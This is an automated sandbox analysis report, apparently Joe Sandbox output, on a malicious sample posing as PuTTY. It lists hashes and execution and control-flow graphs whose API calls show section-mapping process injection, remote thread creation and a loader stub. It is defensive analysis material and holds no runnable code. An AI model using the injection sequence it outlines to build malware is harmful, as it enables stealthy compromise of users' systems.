                                                                                                                      • Opcode ID: e14803721ac89d284ffd3834266de17c11c1f77be417875f6c59d9050618ce34
                                                                                                                      • Instruction ID: a592627117d8aab32538ebc652818d03a7c4836ad683c9b29d8583550c95611c
                                                                                                                      • Opcode Fuzzy Hash: e14803721ac89d284ffd3834266de17c11c1f77be417875f6c59d9050618ce34
                                                                                                                      • Instruction Fuzzy Hash: D71129E2F1D9064BF2A5FE3CE6565BA66D5DF84210B6901F9F81DC3585DC086C014181
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1587075326.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_7ffb4ad20000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 631ec590cc359d01a6b74646032227057f46163c18db6f822506ec54e119a4c5
                                                                                                                      • Instruction ID: 1e53aee6eb80e180f2005a86433b53a01481236e62caa05caa63651cd5e1cae9
                                                                                                                      • Opcode Fuzzy Hash: 631ec590cc359d01a6b74646032227057f46163c18db6f822506ec54e119a4c5
                                                                                                                      • Instruction Fuzzy Hash: 6001677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3655D636E892CB46
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1587538406.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_7ffb4adf0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f8cc4ee14206541070e2fc64ddedfda6211a868c860a249d357ce67d5e8cda42
                                                                                                                      • Instruction ID: 90ef855cc4346635b22d4f93983726f273d4042b3460e2a82cc913b0c1a4c4a3
                                                                                                                      • Opcode Fuzzy Hash: f8cc4ee14206541070e2fc64ddedfda6211a868c860a249d357ce67d5e8cda42
                                                                                                                      • Instruction Fuzzy Hash: D5E0D873F0E96E0FBBA1BDAC65191F96694EF5423171801F7E91CD3145EC049C114391

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:6.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:80.9%
                                                                                                                      Signature Coverage:39.5%
                                                                                                                      Total number of Nodes:162
                                                                                                                      Total number of Limit Nodes:6
                                                                                                                      execution_graph 7556 4013ca 7557 4013d0 7556->7557 7558 401564 NtDuplicateObject 7557->7558 7563 401478 7557->7563 7559 401581 NtCreateSection 7558->7559 7558->7563 7560 401601 NtCreateSection 7559->7560 7561 4015a7 NtMapViewOfSection 7559->7561 7562 40162d 7560->7562 7560->7563 7561->7560 7564 4015ca NtMapViewOfSection 7561->7564 7562->7563 7566 401637 NtMapViewOfSection 7562->7566 7564->7560 7565 4015e8 7564->7565 7565->7560 7566->7563 7567 40165e NtMapViewOfSection 7566->7567 7567->7563 7405 402f8f 7406 4030d2 7405->7406 7407 402fb9 7405->7407 7407->7406 7408 403074 RtlCreateUserThread NtTerminateProcess 7407->7408 7408->7406 7478 40148f 7479 401478 7478->7479 7480 401414 7478->7480 7480->7479 7481 401564 NtDuplicateObject 7480->7481 7481->7479 7482 401581 NtCreateSection 7481->7482 7483 401601 NtCreateSection 7482->7483 7484 4015a7 NtMapViewOfSection 7482->7484 7483->7479 7485 40162d 7483->7485 7484->7483 7486 4015ca NtMapViewOfSection 7484->7486 7485->7479 7488 401637 NtMapViewOfSection 7485->7488 7486->7483 7487 4015e8 7486->7487 7487->7483 7488->7479 7489 40165e NtMapViewOfSection 7488->7489 7489->7479 7312 402e51 7314 402e44 7312->7314 7315 402ef2 7314->7315 7316 401891 7314->7316 7317 4018a1 7316->7317 7318 4018da Sleep 7317->7318 7323 4013bf 7318->7323 7320 4018f5 7322 401906 7320->7322 7335 4014b5 7320->7335 7322->7315 7324 4013d0 7323->7324 7325 401564 NtDuplicateObject 7324->7325 7333 401478 7324->7333 7326 401581 NtCreateSection 7325->7326 7325->7333 7327 401601 NtCreateSection 7326->7327 7328 4015a7 NtMapViewOfSection 7326->7328 7329 40162d 7327->7329 7327->7333 7328->7327 7330 4015ca NtMapViewOfSection 7328->7330 7332 401637 NtMapViewOfSection 7329->7332 7329->7333 7330->7327 7331 4015e8 7330->7331 7331->7327 7332->7333 7334 40165e NtMapViewOfSection 7332->7334 7333->7320 7334->7333 7336 4014c6 7335->7336 7337 401564 NtDuplicateObject 7336->7337 7342 401680 7336->7342 7338 401581 NtCreateSection 7337->7338 7337->7342 7339 401601 NtCreateSection 7338->7339 7340 4015a7 NtMapViewOfSection 7338->7340 7341 40162d 7339->7341 7339->7342 7340->7339 7343 4015ca NtMapViewOfSection 7340->7343 7341->7342 7345 401637 NtMapViewOfSection 7341->7345 7342->7322 7343->7339 7344 4015e8 7343->7344 7344->7339 7345->7342 7346 40165e NtMapViewOfSection 7345->7346 7346->7342 7454 4014d3 7455 4014d8 7454->7455 7456 401680 7455->7456 7457 401564 NtDuplicateObject 7455->7457 7457->7456 7458 401581 NtCreateSection 7457->7458 7459 401601 NtCreateSection 7458->7459 7460 4015a7 NtMapViewOfSection 7458->7460 7459->7456 7461 40162d 7459->7461 7460->7459 7462 4015ca NtMapViewOfSection 7460->7462 7461->7456 7464 401637 NtMapViewOfSection 7461->7464 7462->7459 7463 4015e8 7462->7463 7463->7459 7464->7456 7465 40165e NtMapViewOfSection 7464->7465 7465->7456 7421 5f0005 7426 5f092b GetPEB 7421->7426 7423 5f0030 7428 5f003c 7423->7428 7427 5f0972 7426->7427 7427->7423 7429 5f0049 7428->7429 7430 5f0e0f 2 API calls 7429->7430 7431 5f0223 7430->7431 7432 5f0d90 GetPEB 7431->7432 7433 5f0238 VirtualAlloc 7432->7433 7434 5f0265 7433->7434 7435 5f02ce VirtualProtect 7434->7435 7437 5f030b 7435->7437 7436 5f0439 VirtualFree 7438 5f04be LoadLibraryA 7436->7438 7437->7436 7440 5f08c7 7438->7440 7490 40189c 7491 4018ae 7490->7491 7492 4018da Sleep 7491->7492 7493 4013bf 7 API calls 7492->7493 7494 4018f5 7493->7494 7495 4014b5 7 API calls 7494->7495 7496 401906 7494->7496 7495->7496 7441 5f0001 7442 5f0005 7441->7442 7443 5f092b GetPEB 7442->7443 7444 5f0030 7443->7444 7445 5f003c 7 API calls 7444->7445 7446 5f0038 7445->7446 7347 5f003c 7348 5f0049 7347->7348 7360 5f0e0f SetErrorMode SetErrorMode 7348->7360 7353 5f0265 7354 5f02ce VirtualProtect 7353->7354 7356 5f030b 7354->7356 7355 5f0439 VirtualFree 7357 5f04be LoadLibraryA 7355->7357 7356->7355 7359 5f08c7 7357->7359 7361 5f0223 7360->7361 7362 5f0d90 7361->7362 7363 5f0dad 7362->7363 7364 5f0dbb GetPEB 7363->7364 7365 5f0238 VirtualAlloc 7363->7365 7364->7365 7365->7353 7381 40bc65 7384 40baca 7381->7384 7383 40bc74 7385 40bad6 getSystemCP __setmbcp __malloc_crt 7384->7385 7387 40bb2d __setmbcp 7385->7387 7388 40b8e5 7385->7388 7387->7383 7391 40b905 getSystemCP __setmbcp_nolock 7388->7391 7389 40b910 setSBCS 7389->7387 7391->7389 7392 40b632 7391->7392 7393 40b659 ___crtGetStringTypeA 7392->7393 7397 40b718 7393->7397 7398 40ff63 7393->7398 7396 40ff63 ___crtLCMapStringA LCMapStringW 7396->7397 7397->7391 7399 40ff76 7398->7399 7402 40fbbe 7399->7402 7401 40b6f3 7401->7396 7403 40fbdf LCMapStringW 7402->7403 7404 40fbfa __freea ___convertcp ___ansicp 7402->7404 7403->7404 7404->7401 7523 402d2c 7524 402d35 7523->7524 7525 401891 15 API calls 7524->7525 7526 402ef2 7524->7526 7525->7526 7366 541520 7367 54152f 7366->7367 7370 541cc0 7367->7370 7371 541cdb 7370->7371 7372 541ce4 CreateToolhelp32Snapshot 7371->7372 7373 541d00 Module32First 7371->7373 7372->7371 7372->7373 7374 541538 7373->7374 7375 541d0f 7373->7375 7377 54197f 7375->7377 7378 5419aa 7377->7378 7379 5419f3 7378->7379 7380 5419bb VirtualAlloc 7378->7380 7379->7379 7380->7379 7527 40f1bd 7530 40f031 7527->7530 7531 40f045 7530->7531 7536 410b52 7531->7536 7533 40f051 __forcdecpt_l 7534 410b52 __forcdecpt_l LCMapStringW 7533->7534 7535 40f06e 7534->7535 7537 410b70 7536->7537 7538 410b60 7536->7538 7540 410a3d 7537->7540 7538->7533 7541 410a52 __isleadbyte_l 7540->7541 7542 40ff63 ___crtLCMapStringA LCMapStringW 7541->7542 7543 410a5e __isctype_l 7541->7543 7542->7543 7543->7538

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 85 4013bf-4013c8 86 4013d0-4013d6 85->86 87 4013da 85->87 88 4013dd-401422 call 40113b 86->88 87->86 87->88 98 401424-401440 88->98 99 401496-40149e 88->99 101 401442 98->101 102 4014b7-4014d5 98->102 100 4014a0-4014b2 99->100 104 401492-401494 101->104 105 401444-401446 101->105 106 4014c6-4014e9 102->106 105->100 107 401448-401461 105->107 115 4014e0 106->115 111 401463-401468 107->111 112 4014c4 107->112 113 4014e5-4014f8 111->113 114 40146a 111->114 112->106 122 4014f1-4014f4 113->122 123 4014fb-40150e call 40113b 113->123 116 40146c-401476 114->116 117 4014de 114->117 115->113 119 401414-401422 116->119 120 401478-40147c 116->120 117->115 119->98 119->99 122->123 126 401510 123->126 127 401513-401518 123->127 126->127 129 40183d-401845 127->129 130 40151e-40152f 127->130 129->127 135 40184a 129->135 133 401535-40155e 130->133 134 40183b 130->134 133->134 144 401564-40157b NtDuplicateObject 133->144 134->135 136 401861 135->136 137 401852-40185d 135->137 136->137 138 401864-40188e call 40113b 136->138 137->138 144->134 146 401581-4015a5 NtCreateSection 144->146 148 401601-401627 NtCreateSection 146->148 149 4015a7-4015c8 NtMapViewOfSection 146->149 148->134 150 40162d-401631 148->150 149->148 152 4015ca-4015e6 NtMapViewOfSection 149->152 150->134 154 401637-401658 NtMapViewOfSection 150->154 152->148 153 4015e8-4015fe 152->153 153->148 154->134 156 40165e-40167a NtMapViewOfSection 154->156 156->134 159 401680 call 401685 156->159
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635255109.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                                                                                                      • Instruction ID: b303ee40ce3cd715bffe5459f1355022e0f5cf8d3c2eb96fe6471530370b2b0e
                                                                                                                      • Opcode Fuzzy Hash: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                                                                                                      • Instruction Fuzzy Hash: 3BA10872A04204FBEB219F91CC45EEB7BB8EF81710F24452BF902BA1F1D6749902DB65

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 161 4014b5-4014f8 170 4014f1-4014f4 161->170 171 4014fb-40150e call 40113b 161->171 170->171 174 401510 171->174 175 401513-401518 171->175 174->175 177 40183d-401845 175->177 178 40151e-40152f 175->178 177->175 183 40184a 177->183 181 401535-40155e 178->181 182 40183b 178->182 181->182 192 401564-40157b NtDuplicateObject 181->192 182->183 184 401861 183->184 185 401852-40185d 183->185 184->185 186 401864-40188e call 40113b 184->186 185->186 192->182 194 401581-4015a5 NtCreateSection 192->194 196 401601-401627 NtCreateSection 194->196 197 4015a7-4015c8 NtMapViewOfSection 194->197 196->182 198 40162d-401631 196->198 197->196 200 4015ca-4015e6 NtMapViewOfSection 197->200 198->182 202 401637-401658 NtMapViewOfSection 198->202 200->196 201 4015e8-4015fe 200->201 201->196 202->182 204 40165e-40167a NtMapViewOfSection 202->204 204->182 207 401680 call 401685 204->207
                                                                                                                      APIs
                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635255109.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1546783058-0
                                                                                                                      • Opcode ID: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                                                                                                      • Instruction ID: 19a1d6b0ff796e10bf8f41dee95350edbff68fa9ff5f9bfea876b5d94b6971b3
                                                                                                                      • Opcode Fuzzy Hash: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                                                                                                      • Instruction Fuzzy Hash: C9513BB1900245BFEB209F91CC48FAB7BB8FF85B10F14412AFA11BA2E5D6759941CB64

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 209 4014d3-4014eb 211 4014d8-4014f8 209->211 212 4014ed-4014f4 209->212 214 4014fb-40150e call 40113b 211->214 224 4014f1-4014f4 211->224 212->214 219 401510 214->219 220 401513-401518 214->220 219->220 225 40183d-401845 220->225 226 40151e-40152f 220->226 224->214 225->220 231 40184a 225->231 229 401535-40155e 226->229 230 40183b 226->230 229->230 240 401564-40157b NtDuplicateObject 229->240 230->231 232 401861 231->232 233 401852-40185d 231->233 232->233 234 401864-40188e call 40113b 232->234 233->234 240->230 242 401581-4015a5 NtCreateSection 240->242 244 401601-401627 NtCreateSection 242->244 245 4015a7-4015c8 NtMapViewOfSection 242->245 244->230 246 40162d-401631 244->246 245->244 248 4015ca-4015e6 NtMapViewOfSection 245->248 246->230 250 401637-401658 NtMapViewOfSection 246->250 248->244 249 4015e8-4015fe 248->249 249->244 250->230 252 40165e-40167a NtMapViewOfSection 250->252 252->230 255 401680 call 401685 252->255
                                                                                                                      APIs
                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635255109.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Section$CreateDuplicateObjectView
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1652636561-0
                                                                                                                      • Opcode ID: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                                                                                                      • Instruction ID: 8103355e2e942ff69e8c14b284ac6daeef9955d1bae1450e847efa7766c746d9
                                                                                                                      • Opcode Fuzzy Hash: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                                                                                                      • Instruction Fuzzy Hash: 245127B1900245BBEF209F91CC48FABBBB8EF86B00F144159FA11BA2A5D6719941CB24

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 257 4014f7-40150e call 40113b 261 401510 257->261 262 401513-401518 257->262 261->262 264 40183d-401845 262->264 265 40151e-40152f 262->265 264->262 270 40184a 264->270 268 401535-40155e 265->268 269 40183b 265->269 268->269 279 401564-40157b NtDuplicateObject 268->279 269->270 271 401861 270->271 272 401852-40185d 270->272 271->272 273 401864-40188e call 40113b 271->273 272->273 279->269 281 401581-4015a5 NtCreateSection 279->281 283 401601-401627 NtCreateSection 281->283 284 4015a7-4015c8 NtMapViewOfSection 281->284 283->269 285 40162d-401631 283->285 284->283 287 4015ca-4015e6 NtMapViewOfSection 284->287 285->269 289 401637-401658 NtMapViewOfSection 285->289 287->283 288 4015e8-4015fe 287->288 288->283 289->269 291 40165e-40167a NtMapViewOfSection 289->291 291->269 294 401680 call 401685 291->294
                                                                                                                      APIs
                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635255109.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1546783058-0
                                                                                                                      • Opcode ID: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                                                                                                      • Instruction ID: 2227e086d9928dda04f460d80950503c889386f6503bf0ca9f5f85cfbacfc3af
                                                                                                                      • Opcode Fuzzy Hash: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                                                                                                      • Instruction Fuzzy Hash: 8B5107B1900249BFEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D6719945CB24

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 296 402f8f-402fb3 297 4030d2-4030d7 296->297 298 402fb9-402fd1 296->298 298->297 299 402fd7-402fe8 298->299 300 402fea-402ff3 299->300 301 402ff8-403006 300->301 301->301 302 403008-40300f 301->302 303 403031-403038 302->303 304 403011-403030 302->304 305 40305a-40305d 303->305 306 40303a-403059 303->306 304->303 307 403066 305->307 308 40305f-403062 305->308 306->305 307->300 310 403068-40306d 307->310 308->307 309 403064 308->309 309->310 310->297 311 40306f-403072 310->311 311->297 312 403074-4030cf RtlCreateUserThread NtTerminateProcess 311->312 312->297
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635255109.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcessTerminateThreadUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1921587553-0
                                                                                                                      • Opcode ID: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                                                                                                      • Instruction ID: aa2530698c6aa4494656ae1f9c01ee64b6dc24c6198c14284b052c109098bfb9
                                                                                                                      • Opcode Fuzzy Hash: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                                                                                                      • Instruction Fuzzy Hash: 1F415832618E0C4FD778EE6CA88966377D5E794351B56437AE809D3388EE30DC5183C5

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 313 541cc0-541cd9 314 541cdb-541cdd 313->314 315 541ce4-541cf0 CreateToolhelp32Snapshot 314->315 316 541cdf 314->316 317 541d00-541d0d Module32First 315->317 318 541cf2-541cf8 315->318 316->315 319 541d16-541d1e 317->319 320 541d0f-541d10 call 54197f 317->320 318->317 323 541cfa-541cfe 318->323 324 541d15 320->324 323->314 323->317 324->319
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00541CE8
                                                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 00541D08
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635941173.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_530000_putty.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3833638111-0
                                                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                      • Instruction ID: 36ac583e1c1f0f59f407e493ba2815789a2df5f0767acc7688af92a70698274b
                                                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                      • Instruction Fuzzy Hash: 7AF0C231500B116BD7202BF59C8DBAA7AE8BF493ADF100128E642910C0CA70EC854668

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 5f003c-5f0047 1 5f004c-5f0263 call 5f0a3f call 5f0e0f call 5f0d90 VirtualAlloc 0->1 2 5f0049 0->2 17 5f028b-5f0292 1->17 18 5f0265-5f0289 call 5f0a69 1->18 2->1 20 5f02a1-5f02b0 17->20 21 5f02ce-5f03c2 VirtualProtect call 5f0cce call 5f0ce7 18->21 20->21 22 5f02b2-5f02cc 20->22 29 5f03d1-5f03e0 21->29 22->20 30 5f0439-5f04b8 VirtualFree 29->30 31 5f03e2-5f0437 call 5f0ce7 29->31 33 5f04be-5f04cd 30->33 34 5f05f4-5f05fe 30->34 31->29 38 5f04d3-5f04dd 33->38 35 5f077f-5f0789 34->35 36 5f0604-5f060d 34->36 39 5f078b-5f07a3 35->39 40 5f07a6-5f07b0 35->40 36->35 41 5f0613-5f0637 36->41 38->34 43 5f04e3-5f0505 38->43 39->40 44 5f086e-5f08be LoadLibraryA 40->44 45 5f07b6-5f07cb 40->45 46 5f063e-5f0648 41->46 51 5f0517-5f0520 43->51 52 5f0507-5f0515 43->52 50 5f08c7-5f08f9 44->50 48 5f07d2-5f07d5 45->48 46->35 49 5f064e-5f065a 46->49 53 5f07d7-5f07e0 48->53 54 5f0824-5f0833 48->54 49->35 55 5f0660-5f066a 49->55 56 5f08fb-5f0901 50->56 57 5f0902-5f091d 50->57 58 5f0526-5f0547 51->58 52->58 59 5f07e4-5f0822 53->59 60 5f07e2 53->60 62 5f0839-5f083c 54->62 61 5f067a-5f0689 55->61 56->57 63 5f054d-5f0550 58->63 59->48 60->54 64 5f068f-5f06b2 61->64 65 5f0750-5f077a 61->65 62->44 66 5f083e-5f0847 62->66 68 5f0556-5f056b 63->68 69 5f05e0-5f05ef 63->69 70 5f06ef-5f06fc 64->70 71 5f06b4-5f06ed 64->71 65->46 72 5f084b-5f086c 66->72 73 5f0849 66->73 74 5f056f-5f057a 68->74 75 5f056d 68->75 69->38 76 5f06fe-5f0748 70->76 77 5f074b 70->77 71->70 72->62 73->44 78 5f057c-5f0599 74->78 79 5f059b-5f05bb 74->79 75->69 76->77 77->61 84 5f05bd-5f05db 78->84 79->84 84->63
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005F024D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1636678804.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_5f0000_putty.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID: cess$kernel32.dll
                                                                                                                      • API String ID: 4275171209-1230238691
                                                                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                      • Instruction ID: 4b65ce4eff50f675edf1d61a99df40599f3613a345a7b7b0bfdd16d4a1f72893
                                                                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                      • Instruction Fuzzy Hash: B9526974A01229DFDB64CF58C984BA8BBB1BF09304F1480D9E54DAB392DB34AE85DF14

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 326 5f0e0f-5f0e24 SetErrorMode * 2 327 5f0e2b-5f0e2c 326->327 328 5f0e26 326->328 328->327
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNELBASE(00000400,?,?,005F0223,?,?), ref: 005F0E19
                                                                                                                      • SetErrorMode.KERNELBASE(00000000,?,?,005F0223,?,?), ref: 005F0E1E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1636678804.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_5f0000_putty.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2340568224-0
                                                                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                      • Instruction ID: d5a6bee1921c2ef6b516d6639c820d1612de59ea02b9ca9833ad81ad95a80bb3
                                                                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                      • Instruction Fuzzy Hash: 21D0123154512CB7D7002A94DC09BDD7F1CDF05B62F048411FB0DD9081C774994046E5

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 329 40bc65-40bc6f call 40baca 331 40bc74-40bc81 329->331
                                                                                                                      APIs
                                                                                                                      • __setmbcp.LIBCMT ref: 0040BC6F
                                                                                                                        • Part of subcall function 0040BACA: getSystemCP.LIBCMT ref: 0040BAEF
                                                                                                                        • Part of subcall function 0040BACA: __malloc_crt.LIBCMT ref: 0040BB05
                                                                                                                        • Part of subcall function 0040BACA: __setmbcp_nolock.LIBCMT ref: 0040BB28
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.1635603623.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_40b000_putty.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: System__malloc_crt__setmbcp__setmbcp_nolock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1786829287-0
                                                                                                                      • Opcode ID: 3d85cd77d6638d75a46b3ac3e0861278f81fee0c3a07de576723b0644236972b
                                                                                                                      • Instruction ID: ab897626d73dbb0745f55126157d0f546fefb95dfe1eb26feed99d3202435efc
                                                                                                                      • Opcode Fuzzy Hash: 3d85cd77d6638d75a46b3ac3e0861278f81fee0c3a07de576723b0644236972b
                                                                                                                      • Instruction Fuzzy Hash: 53C02B510080800CD7008B207C0570F3550EF41330F24022EF010C04C6DB695440314C

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 554 401891-4018c1 561 4018d2 554->561 562 4018c9-4018f7 call 40113b Sleep call 4013bf 554->562 561->562 568 401906-40194c call 40113b 562->568 569 4018f9-401901 call 4014b5 562->569 569->568
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004018E2
